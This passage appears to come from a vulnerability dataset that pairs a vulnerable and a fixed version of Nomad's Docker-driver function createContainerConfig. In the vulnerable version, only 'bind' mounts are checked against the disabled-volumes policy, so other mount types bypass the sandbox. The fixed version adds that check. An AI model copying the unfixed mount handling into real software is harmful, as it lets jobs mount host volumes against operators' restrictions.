d.logger.With(\"task_name\", task.Name)\n\tvar c docker.CreateContainerOptions\n\tif task.Resources == nil {\n\t\t// Guard against missing resources. We should never have been able to\n\t\t// schedule a job without specifying this.\n\t\tlogger.Error(\"task.Resources is empty\")\n\t\treturn c, fmt.Errorf(\"task.Resources is empty\")\n\t}\n\n\tbinds, err := d.containerBinds(task, driverConfig)\n\tif err != nil {\n\t\treturn c, err\n\t}\n\tlogger.Trace(\"binding volumes\", \"volumes\", binds)\n\n\t// create the config block that will later be consumed by go-dockerclient\n\tconfig := &docker.Config{\n\t\tImage: imageID,\n\t\tEntrypoint: driverConfig.Entrypoint,\n\t\tHostname: driverConfig.Hostname,\n\t\tUser: task.User,\n\t\tTty: driverConfig.TTY,\n\t\tOpenStdin: driverConfig.Interactive,\n\t}\n\n\tif driverConfig.WorkDir != \"\" {\n\t\tconfig.WorkingDir = driverConfig.WorkDir\n\t}\n\n\thostConfig := &docker.HostConfig{\n\t\tMemory: task.Resources.LinuxResources.MemoryLimitBytes,\n\t\tCPUShares: task.Resources.LinuxResources.CPUShares,\n\n\t\t// Binds are used to mount a host volume into the container. We mount a\n\t\t// local directory for storage and a shared alloc directory that can be\n\t\t// used to share data between different tasks in the same task group.\n\t\tBinds: binds,\n\n\t\tStorageOpt: driverConfig.StorageOpt,\n\t\tVolumeDriver: driverConfig.VolumeDriver,\n\n\t\tPidsLimit: driverConfig.PidsLimit,\n\t}\n\n\tif _, ok := task.DeviceEnv[nvidiaVisibleDevices]; ok {\n\t\tif !d.gpuRuntime {\n\t\t\treturn c, fmt.Errorf(\"requested docker-runtime %q was not found\", d.config.GPURuntimeName)\n\t\t}\n\t\thostConfig.Runtime = d.config.GPURuntimeName\n\t}\n\n\t// Calculate CPU Quota\n\t// cfs_quota_us is the time per core, so we must\n\t// multiply the time by the number of cores available\n\t// See https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/resource_management_guide/sec-cpu\n\tif driverConfig.CPUHardLimit {\n\t\tnumCores := runtime.NumCPU()\n\t\tif driverConfig.CPUCFSPeriod < 0 || driverConfig.CPUCFSPeriod > 1000000 {\n\t\t\treturn c, fmt.Errorf(\"invalid value for cpu_cfs_period\")\n\t\t}\n\t\tif driverConfig.CPUCFSPeriod == 0 {\n\t\t\tdriverConfig.CPUCFSPeriod = task.Resources.LinuxResources.CPUPeriod\n\t\t}\n\t\thostConfig.CPUPeriod = driverConfig.CPUCFSPeriod\n\t\thostConfig.CPUQuota = int64(task.Resources.LinuxResources.PercentTicks*float64(driverConfig.CPUCFSPeriod)) * int64(numCores)\n\t}\n\n\t// Windows does not support MemorySwap/MemorySwappiness #2193\n\tif runtime.GOOS == \"windows\" {\n\t\thostConfig.MemorySwap = 0\n\t\thostConfig.MemorySwappiness = -1\n\t} else {\n\t\thostConfig.MemorySwap = task.Resources.LinuxResources.MemoryLimitBytes // MemorySwap is memory + swap.\n\t}\n\n\tloggingDriver := driverConfig.Logging.Type\n\tif loggingDriver == \"\" {\n\t\tloggingDriver = driverConfig.Logging.Driver\n\t}\n\n\thostConfig.LogConfig = docker.LogConfig{\n\t\tType: loggingDriver,\n\t\tConfig: driverConfig.Logging.Config,\n\t}\n\n\tif hostConfig.LogConfig.Type == \"\" && hostConfig.LogConfig.Config == nil {\n\t\tlogger.Trace(\"no docker log driver provided, defaulting to json-file\")\n\t\thostConfig.LogConfig.Type = \"json-file\"\n\t\thostConfig.LogConfig.Config = map[string]string{\n\t\t\t\"max-file\": \"2\",\n\t\t\t\"max-size\": \"2m\",\n\t\t}\n\t}\n\n\tlogger.Debug(\"configured resources\", \"memory\", hostConfig.Memory,\n\t\t\"cpu_shares\", hostConfig.CPUShares, \"cpu_quota\", hostConfig.CPUQuota,\n\t\t\"cpu_period\", hostConfig.CPUPeriod)\n\tlogger.Debug(\"binding directories\", \"binds\", hclog.Fmt(\"%#v\", hostConfig.Binds))\n\n\t// set privileged mode\n\tif driverConfig.Privileged && !d.config.AllowPrivileged {\n\t\treturn c, fmt.Errorf(`Docker privileged mode is disabled on this Nomad agent`)\n\t}\n\thostConfig.Privileged = driverConfig.Privileged\n\n\t// set capabilities\n\thostCapsWhitelistConfig := d.config.AllowCaps\n\thostCapsWhitelist := make(map[string]struct{})\n\tfor _, cap := range hostCapsWhitelistConfig {\n\t\tcap = strings.ToLower(strings.TrimSpace(cap))\n\t\thostCapsWhitelist[cap] = struct{}{}\n\t}\n\n\tif _, ok := hostCapsWhitelist[\"all\"]; !ok {\n\t\teffectiveCaps, err := tweakCapabilities(\n\t\t\tstrings.Split(dockerBasicCaps, \",\"),\n\t\t\tdriverConfig.CapAdd,\n\t\t\tdriverConfig.CapDrop,\n\t\t)\n\t\tif err != nil {\n\t\t\treturn c, err\n\t\t}\n\t\tvar missingCaps []string\n\t\tfor _, cap := range effectiveCaps {\n\t\t\tcap = strings.ToLower(cap)\n\t\t\tif _, ok := hostCapsWhitelist[cap]; !ok {\n\t\t\t\tmissingCaps = append(missingCaps, cap)\n\t\t\t}\n\t\t}\n\t\tif len(missingCaps) > 0 {\n\t\t\treturn c, fmt.Errorf(\"Docker driver doesn't have the following caps whitelisted on this Nomad agent: %s\", missingCaps)\n\t\t}\n\t}\n\n\thostConfig.CapAdd = driverConfig.CapAdd\n\thostConfig.CapDrop = driverConfig.CapDrop\n\n\t// set SHM size\n\tif driverConfig.ShmSize != 0 {\n\t\thostConfig.ShmSize = driverConfig.ShmSize\n\t}\n\n\t// set DNS servers\n\tfor _, ip := range driverConfig.DNSServers {\n\t\tif net.ParseIP(ip) != nil {\n\t\t\thostConfig.DNS = append(hostConfig.DNS, ip)\n\t\t} else {\n\t\t\tlogger.Error(\"invalid ip address for container dns server\", \"ip\", ip)\n\t\t}\n\t}\n\n\t// Setup devices\n\tfor _, device := range driverConfig.Devices {\n\t\tdd, err := device.toDockerDevice()\n\t\tif err != nil {\n\t\t\treturn c, err\n\t\t}\n\t\thostConfig.Devices = append(hostConfig.Devices, dd)\n\t}\n\tfor _, device := range task.Devices {\n\t\thostConfig.Devices = append(hostConfig.Devices, docker.Device{\n\t\t\tPathOnHost: device.HostPath,\n\t\t\tPathInContainer: device.TaskPath,\n\t\t\tCgroupPermissions: device.Permissions,\n\t\t})\n\t}\n\n\t// Setup mounts\n\tfor _, m := range driverConfig.Mounts {\n\t\thm, err := m.toDockerHostMount()\n\t\tif err != nil {\n\t\t\treturn c, err\n\t\t}\n\n\t\tif hm.Type == \"bind\" {\n\t\t\thm.Source = expandPath(task.TaskDir().Dir, hm.Source)\n\n\t\t\t// paths inside alloc dir are always allowed as they mount within a container, and treated as relative to task dir\n\t\t\tif !d.config.Volumes.Enabled && !isParentPath(task.AllocDir, hm.Source) {\n\t\t\t\treturn c, fmt.Errorf(\"volumes are not enabled; cannot mount host path: %q %q\", hm.Source, task.AllocDir)\n\t\t\t}\n\t\t}\n\n\t\thostConfig.Mounts = append(hostConfig.Mounts, hm)\n\t}\n\n\tfor _, m := range task.Mounts {\n\t\thm := docker.HostMount{\n\t\t\tType: \"bind\",\n\t\t\tTarget: m.TaskPath,\n\t\t\tSource: m.HostPath,\n\t\t\tReadOnly: m.Readonly,\n\t\t}\n\n\t\t// MountPropagation is only supported by Docker on Linux:\n\t\t// https://docs.docker.com/storage/bind-mounts/#configure-bind-propagation\n\t\tif runtime.GOOS == \"linux\" {\n\t\t\thm.BindOptions = &docker.BindOptions{\n\t\t\t\tPropagation: userMountToUnixMount[m.PropagationMode],\n\t\t\t}\n\t\t}\n\n\t\thostConfig.Mounts = append(hostConfig.Mounts, hm)\n\t}\n\n\t// set DNS search domains and extra hosts\n\thostConfig.DNSSearch = driverConfig.DNSSearchDomains\n\thostConfig.DNSOptions = driverConfig.DNSOptions\n\thostConfig.ExtraHosts = driverConfig.ExtraHosts\n\n\thostConfig.IpcMode = driverConfig.IPCMode\n\thostConfig.PidMode = driverConfig.PidMode\n\thostConfig.UTSMode = driverConfig.UTSMode\n\thostConfig.UsernsMode = driverConfig.UsernsMode\n\thostConfig.SecurityOpt = driverConfig.SecurityOpt\n\thostConfig.Sysctls = driverConfig.Sysctl\n\n\tulimits, err := sliceMergeUlimit(driverConfig.Ulimit)\n\tif err != nil {\n\t\treturn c, fmt.Errorf(\"failed to parse ulimit configuration: %v\", err)\n\t}\n\thostConfig.Ulimits = ulimits\n\n\thostConfig.ReadonlyRootfs = driverConfig.ReadonlyRootfs\n\n\t// set the docker network mode\n\thostConfig.NetworkMode = driverConfig.NetworkMode\n\n\t// if the driver config does not specify a network mode then try to use the\n\t// shared alloc network\n\tif hostConfig.NetworkMode == \"\" {\n\t\tif task.NetworkIsolation != nil && task.NetworkIsolation.Path != \"\" {\n\t\t\t// find the previously created parent container to join networks with\n\t\t\tnetMode := fmt.Sprintf(\"container:%s\", task.NetworkIsolation.Labels[dockerNetSpecLabelKey])\n\t\t\tlogger.Debug(\"configuring network mode for task group\", \"network_mode\", netMode)\n\t\t\thostConfig.NetworkMode = netMode\n\t\t} else {\n\t\t\t// docker default\n\t\t\tlogger.Debug(\"networking mode not specified; using default\")\n\t\t\thostConfig.NetworkMode = \"default\"\n\t\t}\n\t}\n\n\t// Setup port mapping and exposed ports\n\tif len(task.Resources.NomadResources.Networks) == 0 {\n\t\tif len(driverConfig.PortMap) > 0 {\n\t\t\treturn c, fmt.Errorf(\"Trying to map ports but no network interface is available\")\n\t\t}\n\t} else {\n\t\t// TODO add support for more than one network\n\t\tnetwork := task.Resources.NomadResources.Networks[0]\n\t\tpublishedPorts := map[docker.Port][]docker.PortBinding{}\n\t\texposedPorts := map[docker.Port]struct{}{}\n\n\t\tfor _, port := range network.ReservedPorts {\n\t\t\t// By default we will map the allocated port 1:1 to the container\n\t\t\tcontainerPortInt := port.Value\n\n\t\t\t// If the user has mapped a port using port_map we'll change it here\n\t\t\tif mapped, ok := driverConfig.PortMap[port.Label]; ok {\n\t\t\t\tcontainerPortInt = mapped\n\t\t\t}\n\n\t\t\thostPortStr := strconv.Itoa(port.Value)\n\t\t\tcontainerPort := docker.Port(strconv.Itoa(containerPortInt))\n\n\t\t\tpublishedPorts[containerPort+\"/tcp\"] = getPortBinding(network.IP, hostPortStr)\n\t\t\tpublishedPorts[containerPort+\"/udp\"] = getPortBinding(network.IP, hostPortStr)\n\t\t\tlogger.Debug(\"allocated static port\", \"ip\", network.IP, \"port\", port.Value)\n\n\t\t\texposedPorts[containerPort+\"/tcp\"] = struct{}{}\n\t\t\texposedPorts[containerPort+\"/udp\"] = struct{}{}\n\t\t\tlogger.Debug(\"exposed port\", \"port\", port.Value)\n\t\t}\n\n\t\tfor _, port := range network.DynamicPorts {\n\t\t\t// By default we will map the allocated port 1:1 to the container\n\t\t\tcontainerPortInt := port.Value\n\n\t\t\t// If the user has mapped a port using port_map we'll change it here\n\t\t\tif mapped, ok := driverConfig.PortMap[port.Label]; ok {\n\t\t\t\tcontainerPortInt = mapped\n\t\t\t}\n\n\t\t\thostPortStr := strconv.Itoa(port.Value)\n\t\t\tcontainerPort := docker.Port(strconv.Itoa(containerPortInt))\n\n\t\t\tpublishedPorts[containerPort+\"/tcp\"] = getPortBinding(network.IP, hostPortStr)\n\t\t\tpublishedPorts[containerPort+\"/udp\"] = getPortBinding(network.IP, hostPortStr)\n\t\t\tlogger.Debug(\"allocated mapped port\", \"ip\", network.IP, \"port\", port.Value)\n\n\t\t\texposedPorts[containerPort+\"/tcp\"] = struct{}{}\n\t\t\texposedPorts[containerPort+\"/udp\"] = struct{}{}\n\t\t\tlogger.Debug(\"exposed port\", \"port\", containerPort)\n\t\t}\n\n\t\thostConfig.PortBindings = publishedPorts\n\t\tconfig.ExposedPorts = exposedPorts\n\t}\n\n\t// If the user specified a custom command to run, we'll inject it here.\n\tif driverConfig.Command != \"\" {\n\t\t// Validate command\n\t\tif err := validateCommand(driverConfig.Command, \"args\"); err != nil {\n\t\t\treturn c, err\n\t\t}\n\n\t\tcmd := []string{driverConfig.Command}\n\t\tif len(driverConfig.Args) != 0 {\n\t\t\tcmd = append(cmd, driverConfig.Args...)\n\t\t}\n\t\tlogger.Debug(\"setting container startup command\", \"command\", strings.Join(cmd, \" \"))\n\t\tconfig.Cmd = cmd\n\t} else if len(driverConfig.Args) != 0 {\n\t\tconfig.Cmd = driverConfig.Args\n\t}\n\n\tif len(driverConfig.Labels) > 0 {\n\t\tconfig.Labels = driverConfig.Labels\n\t}\n\n\tlabels := make(map[string]string, len(driverConfig.Labels)+1)\n\tfor k, v := range driverConfig.Labels {\n\t\tlabels[k] = v\n\t}\n\tlabels[dockerLabelAllocID] = task.AllocID\n\tconfig.Labels = labels\n\tlogger.Debug(\"applied labels on the container\", \"labels\", config.Labels)\n\n\tconfig.Env = task.EnvList()\n\n\tcontainerName := fmt.Sprintf(\"%s-%s\", strings.Replace(task.Name, \"/\", \"_\", -1), task.AllocID)\n\tlogger.Debug(\"setting container name\", \"container_name\", containerName)\n\n\tvar networkingConfig *docker.NetworkingConfig\n\tif len(driverConfig.NetworkAliases) > 0 || driverConfig.IPv4Address != \"\" || driverConfig.IPv6Address != \"\" {\n\t\tnetworkingConfig = &docker.NetworkingConfig{\n\t\t\tEndpointsConfig: map[string]*docker.EndpointConfig{\n\t\t\t\thostConfig.NetworkMode: {},\n\t\t\t},\n\t\t}\n\t}\n\n\tif len(driverConfig.NetworkAliases) > 0 {\n\t\tnetworkingConfig.EndpointsConfig[hostConfig.NetworkMode].Aliases = driverConfig.NetworkAliases\n\t\tlogger.Debug(\"setting container network aliases\", \"network_mode\", hostConfig.NetworkMode,\n\t\t\t\"network_aliases\", strings.Join(driverConfig.NetworkAliases, \", \"))\n\t}\n\n\tif driverConfig.IPv4Address != \"\" || driverConfig.IPv6Address != \"\" {\n\t\tnetworkingConfig.EndpointsConfig[hostConfig.NetworkMode].IPAMConfig = &docker.EndpointIPAMConfig{\n\t\t\tIPv4Address: driverConfig.IPv4Address,\n\t\t\tIPv6Address: driverConfig.IPv6Address,\n\t\t}\n\t\tlogger.Debug(\"setting container network configuration\", \"network_mode\", hostConfig.NetworkMode,\n\t\t\t\"ipv4_address\", driverConfig.IPv4Address, \"ipv6_address\", driverConfig.IPv6Address)\n\t}\n\n\tif driverConfig.MacAddress != \"\" {\n\t\tconfig.MacAddress = driverConfig.MacAddress\n\t\tlogger.Debug(\"setting container mac address\", \"mac_address\", config.MacAddress)\n\t}\n\n\treturn docker.CreateContainerOptions{\n\t\tName: containerName,\n\t\tConfig: config,\n\t\tHostConfig: hostConfig,\n\t\tNetworkingConfig: networkingConfig,\n\t}, nil\n}"}], "fix_func": [{"id": "fix_go_260_1", "commit": "9c1073d9633691ff7ba8804f59c68b822af521bd", "file_path": "drivers/docker/driver.go", "start_line": 675, "end_line": 1061, "snippet": "func (d *Driver) createContainerConfig(task *drivers.TaskConfig, driverConfig *TaskConfig,\n\timageID string) (docker.CreateContainerOptions, error) {\n\n\t// ensure that PortMap variables are populated early on\n\ttask.Env = taskenv.SetPortMapEnvs(task.Env, driverConfig.PortMap)\n\n\tlogger := d.logger.With(\"task_name\", task.Name)\n\tvar c docker.CreateContainerOptions\n\tif task.Resources == nil {\n\t\t// Guard against missing resources. We should never have been able to\n\t\t// schedule a job without specifying this.\n\t\tlogger.Error(\"task.Resources is empty\")\n\t\treturn c, fmt.Errorf(\"task.Resources is empty\")\n\t}\n\n\tbinds, err := d.containerBinds(task, driverConfig)\n\tif err != nil {\n\t\treturn c, err\n\t}\n\tlogger.Trace(\"binding volumes\", \"volumes\", binds)\n\n\t// create the config block that will later be consumed by go-dockerclient\n\tconfig := &docker.Config{\n\t\tImage: imageID,\n\t\tEntrypoint: driverConfig.Entrypoint,\n\t\tHostname: driverConfig.Hostname,\n\t\tUser: task.User,\n\t\tTty: driverConfig.TTY,\n\t\tOpenStdin: driverConfig.Interactive,\n\t}\n\n\tif driverConfig.WorkDir != \"\" {\n\t\tconfig.WorkingDir = driverConfig.WorkDir\n\t}\n\n\thostConfig := &docker.HostConfig{\n\t\tMemory: task.Resources.LinuxResources.MemoryLimitBytes,\n\t\tCPUShares: task.Resources.LinuxResources.CPUShares,\n\n\t\t// Binds are used to mount a host volume into the container. We mount a\n\t\t// local directory for storage and a shared alloc directory that can be\n\t\t// used to share data between different tasks in the same task group.\n\t\tBinds: binds,\n\n\t\tStorageOpt: driverConfig.StorageOpt,\n\t\tVolumeDriver: driverConfig.VolumeDriver,\n\n\t\tPidsLimit: driverConfig.PidsLimit,\n\t}\n\n\tif _, ok := task.DeviceEnv[nvidiaVisibleDevices]; ok {\n\t\tif !d.gpuRuntime {\n\t\t\treturn c, fmt.Errorf(\"requested docker-runtime %q was not found\", d.config.GPURuntimeName)\n\t\t}\n\t\thostConfig.Runtime = d.config.GPURuntimeName\n\t}\n\n\t// Calculate CPU Quota\n\t// cfs_quota_us is the time per core, so we must\n\t// multiply the time by the number of cores available\n\t// See https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/resource_management_guide/sec-cpu\n\tif driverConfig.CPUHardLimit {\n\t\tnumCores := runtime.NumCPU()\n\t\tif driverConfig.CPUCFSPeriod < 0 || driverConfig.CPUCFSPeriod > 1000000 {\n\t\t\treturn c, fmt.Errorf(\"invalid value for cpu_cfs_period\")\n\t\t}\n\t\tif driverConfig.CPUCFSPeriod == 0 {\n\t\t\tdriverConfig.CPUCFSPeriod = task.Resources.LinuxResources.CPUPeriod\n\t\t}\n\t\thostConfig.CPUPeriod = driverConfig.CPUCFSPeriod\n\t\thostConfig.CPUQuota = int64(task.Resources.LinuxResources.PercentTicks*float64(driverConfig.CPUCFSPeriod)) * int64(numCores)\n\t}\n\n\t// Windows does not support MemorySwap/MemorySwappiness #2193\n\tif runtime.GOOS == \"windows\" {\n\t\thostConfig.MemorySwap = 0\n\t\thostConfig.MemorySwappiness = -1\n\t} else {\n\t\thostConfig.MemorySwap = task.Resources.LinuxResources.MemoryLimitBytes // MemorySwap is memory + swap.\n\t}\n\n\tloggingDriver := driverConfig.Logging.Type\n\tif loggingDriver == \"\" {\n\t\tloggingDriver = driverConfig.Logging.Driver\n\t}\n\n\thostConfig.LogConfig = docker.LogConfig{\n\t\tType: loggingDriver,\n\t\tConfig: driverConfig.Logging.Config,\n\t}\n\n\tif hostConfig.LogConfig.Type == \"\" && hostConfig.LogConfig.Config == nil {\n\t\tlogger.Trace(\"no docker log driver provided, defaulting to json-file\")\n\t\thostConfig.LogConfig.Type = \"json-file\"\n\t\thostConfig.LogConfig.Config = map[string]string{\n\t\t\t\"max-file\": \"2\",\n\t\t\t\"max-size\": \"2m\",\n\t\t}\n\t}\n\n\tlogger.Debug(\"configured resources\", \"memory\", hostConfig.Memory,\n\t\t\"cpu_shares\", hostConfig.CPUShares, \"cpu_quota\", hostConfig.CPUQuota,\n\t\t\"cpu_period\", hostConfig.CPUPeriod)\n\tlogger.Debug(\"binding directories\", \"binds\", hclog.Fmt(\"%#v\", hostConfig.Binds))\n\n\t// set privileged mode\n\tif driverConfig.Privileged && !d.config.AllowPrivileged {\n\t\treturn c, fmt.Errorf(`Docker privileged mode is disabled on this Nomad agent`)\n\t}\n\thostConfig.Privileged = driverConfig.Privileged\n\n\t// set capabilities\n\thostCapsWhitelistConfig := d.config.AllowCaps\n\thostCapsWhitelist := make(map[string]struct{})\n\tfor _, cap := range hostCapsWhitelistConfig {\n\t\tcap = strings.ToLower(strings.TrimSpace(cap))\n\t\thostCapsWhitelist[cap] = struct{}{}\n\t}\n\n\tif _, ok := hostCapsWhitelist[\"all\"]; !ok {\n\t\teffectiveCaps, err := tweakCapabilities(\n\t\t\tstrings.Split(dockerBasicCaps, \",\"),\n\t\t\tdriverConfig.CapAdd,\n\t\t\tdriverConfig.CapDrop,\n\t\t)\n\t\tif err != nil {\n\t\t\treturn c, err\n\t\t}\n\t\tvar missingCaps []string\n\t\tfor _, cap := range effectiveCaps {\n\t\t\tcap = strings.ToLower(cap)\n\t\t\tif _, ok := hostCapsWhitelist[cap]; !ok {\n\t\t\t\tmissingCaps = append(missingCaps, cap)\n\t\t\t}\n\t\t}\n\t\tif len(missingCaps) > 0 {\n\t\t\treturn c, fmt.Errorf(\"Docker driver doesn't have the following caps whitelisted on this Nomad agent: %s\", missingCaps)\n\t\t}\n\t}\n\n\thostConfig.CapAdd = driverConfig.CapAdd\n\thostConfig.CapDrop = driverConfig.CapDrop\n\n\t// set SHM size\n\tif driverConfig.ShmSize != 0 {\n\t\thostConfig.ShmSize = driverConfig.ShmSize\n\t}\n\n\t// set DNS servers\n\tfor _, ip := range driverConfig.DNSServers {\n\t\tif net.ParseIP(ip) != nil {\n\t\t\thostConfig.DNS = append(hostConfig.DNS, ip)\n\t\t} else {\n\t\t\tlogger.Error(\"invalid ip address for container dns server\", \"ip\", ip)\n\t\t}\n\t}\n\n\t// Setup devices\n\tfor _, device := range driverConfig.Devices {\n\t\tdd, err := device.toDockerDevice()\n\t\tif err != nil {\n\t\t\treturn c, err\n\t\t}\n\t\thostConfig.Devices = append(hostConfig.Devices, dd)\n\t}\n\tfor _, device := range task.Devices {\n\t\thostConfig.Devices = append(hostConfig.Devices, docker.Device{\n\t\t\tPathOnHost: device.HostPath,\n\t\t\tPathInContainer: device.TaskPath,\n\t\t\tCgroupPermissions: device.Permissions,\n\t\t})\n\t}\n\n\t// Setup mounts\n\tfor _, m := range driverConfig.Mounts {\n\t\thm, err := m.toDockerHostMount()\n\t\tif err != nil {\n\t\t\treturn c, err\n\t\t}\n\n\t\tswitch hm.Type {\n\t\tcase \"bind\":\n\t\t\thm.Source = expandPath(task.TaskDir().Dir, hm.Source)\n\n\t\t\t// paths inside alloc dir are always allowed as they mount within\n\t\t\t// a container, and treated as relative to task dir\n\t\t\tif !d.config.Volumes.Enabled && !isParentPath(task.AllocDir, hm.Source) {\n\t\t\t\treturn c, fmt.Errorf(\n\t\t\t\t\t\"volumes are not enabled; cannot mount host path: %q %q\",\n\t\t\t\t\thm.Source, task.AllocDir)\n\t\t\t}\n\t\tcase \"tmpfs\":\n\t\t\t// no source, so no sandbox check required\n\t\tdefault: // \"volume\", but also any new thing that comes along\n\t\t\tif !d.config.Volumes.Enabled {\n\t\t\t\treturn c, fmt.Errorf(\n\t\t\t\t\t\"volumes are not enabled; cannot mount volume: %q\", hm.Source)\n\t\t\t}\n\t\t}\n\n\t\thostConfig.Mounts = append(hostConfig.Mounts, hm)\n\t}\n\n\tfor _, m := range task.Mounts {\n\t\thm := docker.HostMount{\n\t\t\tType: \"bind\",\n\t\t\tTarget: m.TaskPath,\n\t\t\tSource: m.HostPath,\n\t\t\tReadOnly: m.Readonly,\n\t\t}\n\n\t\t// MountPropagation is only supported by Docker on Linux:\n\t\t// https://docs.docker.com/storage/bind-mounts/#configure-bind-propagation\n\t\tif runtime.GOOS == \"linux\" {\n\t\t\thm.BindOptions = &docker.BindOptions{\n\t\t\t\tPropagation: userMountToUnixMount[m.PropagationMode],\n\t\t\t}\n\t\t}\n\n\t\thostConfig.Mounts = append(hostConfig.Mounts, hm)\n\t}\n\n\t// set DNS search domains and extra hosts\n\thostConfig.DNSSearch = driverConfig.DNSSearchDomains\n\thostConfig.DNSOptions = driverConfig.DNSOptions\n\thostConfig.ExtraHosts = driverConfig.ExtraHosts\n\n\thostConfig.IpcMode = driverConfig.IPCMode\n\thostConfig.PidMode = driverConfig.PidMode\n\thostConfig.UTSMode = driverConfig.UTSMode\n\thostConfig.UsernsMode = driverConfig.UsernsMode\n\thostConfig.SecurityOpt = driverConfig.SecurityOpt\n\thostConfig.Sysctls = driverConfig.Sysctl\n\n\tulimits, err := sliceMergeUlimit(driverConfig.Ulimit)\n\tif err != nil {\n\t\treturn c, fmt.Errorf(\"failed to parse ulimit configuration: %v\", err)\n\t}\n\thostConfig.Ulimits = ulimits\n\n\thostConfig.ReadonlyRootfs = driverConfig.ReadonlyRootfs\n\n\t// set the docker network mode\n\thostConfig.NetworkMode = driverConfig.NetworkMode\n\n\t// if the driver config does not specify a network mode then try to use the\n\t// shared alloc network\n\tif hostConfig.NetworkMode == \"\" {\n\t\tif task.NetworkIsolation != nil && task.NetworkIsolation.Path != \"\" {\n\t\t\t// find the previously created parent container to join networks with\n\t\t\tnetMode := fmt.Sprintf(\"container:%s\", task.NetworkIsolation.Labels[dockerNetSpecLabelKey])\n\t\t\tlogger.Debug(\"configuring network mode for task group\", \"network_mode\", netMode)\n\t\t\thostConfig.NetworkMode = netMode\n\t\t} else {\n\t\t\t// docker default\n\t\t\tlogger.Debug(\"networking mode not specified; using default\")\n\t\t\thostConfig.NetworkMode = \"default\"\n\t\t}\n\t}\n\n\t// Setup port mapping and exposed ports\n\tif len(task.Resources.NomadResources.Networks) == 0 {\n\t\tif len(driverConfig.PortMap) > 0 {\n\t\t\treturn c, fmt.Errorf(\"Trying to map ports but no network interface is available\")\n\t\t}\n\t} else {\n\t\t// TODO add support for more than one network\n\t\tnetwork := task.Resources.NomadResources.Networks[0]\n\t\tpublishedPorts := map[docker.Port][]docker.PortBinding{}\n\t\texposedPorts := map[docker.Port]struct{}{}\n\n\t\tfor _, port := range network.ReservedPorts {\n\t\t\t// By default we will map the allocated port 1:1 to the container\n\t\t\tcontainerPortInt := port.Value\n\n\t\t\t// If the user has mapped a port using port_map we'll change it here\n\t\t\tif mapped, ok := driverConfig.PortMap[port.Label]; ok {\n\t\t\t\tcontainerPortInt = mapped\n\t\t\t}\n\n\t\t\thostPortStr := strconv.Itoa(port.Value)\n\t\t\tcontainerPort := docker.Port(strconv.Itoa(containerPortInt))\n\n\t\t\tpublishedPorts[containerPort+\"/tcp\"] = getPortBinding(network.IP, hostPortStr)\n\t\t\tpublishedPorts[containerPort+\"/udp\"] = getPortBinding(network.IP, hostPortStr)\n\t\t\tlogger.Debug(\"allocated static port\", \"ip\", network.IP, \"port\", port.Value)\n\n\t\t\texposedPorts[containerPort+\"/tcp\"] = struct{}{}\n\t\t\texposedPorts[containerPort+\"/udp\"] = struct{}{}\n\t\t\tlogger.Debug(\"exposed port\", \"port\", port.Value)\n\t\t}\n\n\t\tfor _, port := range network.DynamicPorts {\n\t\t\t// By default we will map the allocated port 1:1 to the container\n\t\t\tcontainerPortInt := port.Value\n\n\t\t\t// If the user has mapped a port using port_map we'll change it here\n\t\t\tif mapped, ok := driverConfig.PortMap[port.Label]; ok {\n\t\t\t\tcontainerPortInt = mapped\n\t\t\t}\n\n\t\t\thostPortStr := strconv.Itoa(port.Value)\n\t\t\tcontainerPort := docker.Port(strconv.Itoa(containerPortInt))\n\n\t\t\tpublishedPorts[containerPort+\"/tcp\"] = getPortBinding(network.IP, hostPortStr)\n\t\t\tpublishedPorts[containerPort+\"/udp\"] = getPortBinding(network.IP, hostPortStr)\n\t\t\tlogger.Debug(\"allocated mapped port\", \"ip\", network.IP, \"port\", port.Value)\n\n\t\t\texposedPorts[containerPort+\"/tcp\"] = struct{}{}\n\t\t\texposedPorts[containerPort+\"/udp\"] = struct{}{}\n\t\t\tlogger.Debug(\"exposed port\", \"port\", containerPort)\n\t\t}\n\n\t\thostConfig.PortBindings = publishedPorts\n\t\tconfig.ExposedPorts = exposedPorts\n\t}\n\n\t// If the user specified a custom command to run, we'll inject it here.\n\tif driverConfig.Command != \"\" {\n\t\t// Validate command\n\t\tif err := validateCommand(driverConfig.Command, \"args\"); err != nil {\n\t\t\treturn c, err\n\t\t}\n\n\t\tcmd := []string{driverConfig.Command}\n\t\tif len(driverConfig.Args) != 0 {\n\t\t\tcmd = append(cmd, driverConfig.Args...)\n\t\t}\n\t\tlogger.Debug(\"setting container startup command\", \"command\", strings.Join(cmd, \" \"))\n\t\tconfig.Cmd = cmd\n\t} else if len(driverConfig.Args) != 0 {\n\t\tconfig.Cmd = driverConfig.Args\n\t}\n\n\tif len(driverConfig.Labels) > 0 {\n\t\tconfig.Labels = driverConfig.Labels\n\t}\n\n\tlabels := make(map[string]string, len(driverConfig.Labels)+1)\n\tfor k, v := range driverConfig.Labels {\n\t\tlabels[k] = v\n\t}\n\tlabels[dockerLabelAllocID] = task.AllocID\n\tconfig.Labels = labels\n\tlogger.Debug(\"applied labels on the container\", \"labels\", config.Labels)\n\n\tconfig.Env = task.EnvList()\n\n\tcontainerName := fmt.Sprintf(\"%s-%s\", strings.Replace(task.Name, \"/\", \"_\", -1), task.AllocID)\n\tlogger.Debug(\"setting container name\", \"container_name\", containerName)\n\n\tvar networkingConfig *docker.NetworkingConfig\n\tif len(driverConfig.NetworkAliases) > 0 || driverConfig.IPv4Address != \"\" || driverConfig.IPv6Address != \"\" {\n\t\tnetworkingConfig = &docker.NetworkingConfig{\n\t\t\tEndpointsConfig: map[string]*docker.EndpointConfig{\n\t\t\t\thostConfig.NetworkMode: {},\n\t\t\t},\n\t\t}\n\t}\n\n\tif len(driverConfig.NetworkAliases) > 0 {\n\t\tnetworkingConfig.EndpointsConfig[hostConfig.NetworkMode].Aliases = driverConfig.NetworkAliases\n\t\tlogger.Debug(\"setting container network aliases\", \"network_mode\", hostConfig.NetworkMode,\n\t\t\t\"network_aliases\", strings.Join(driverConfig.NetworkAliases, \", \"))\n\t}\n\n\tif driverConfig.IPv4Address != \"\" || driverConfig.IPv6Address != \"\" {\n\t\tnetworkingConfig.EndpointsConfig[hostConfig.NetworkMode].IPAMConfig = &docker.EndpointIPAMConfig{\n\t\t\tIPv4Address: driverConfig.IPv4Address,\n\t\t\tIPv6Address: driverConfig.IPv6Address,\n\t\t}\n\t\tlogger.Debug(\"setting container network configuration\", \"network_mode\", hostConfig.NetworkMode,\n\t\t\t\"ipv4_address\", driverConfig.IPv4Address, \"ipv6_address\", driverConfig.IPv6Address)\n\t}\n\n\tif driverConfig.MacAddress != \"\" {\n\t\tconfig.MacAddress = 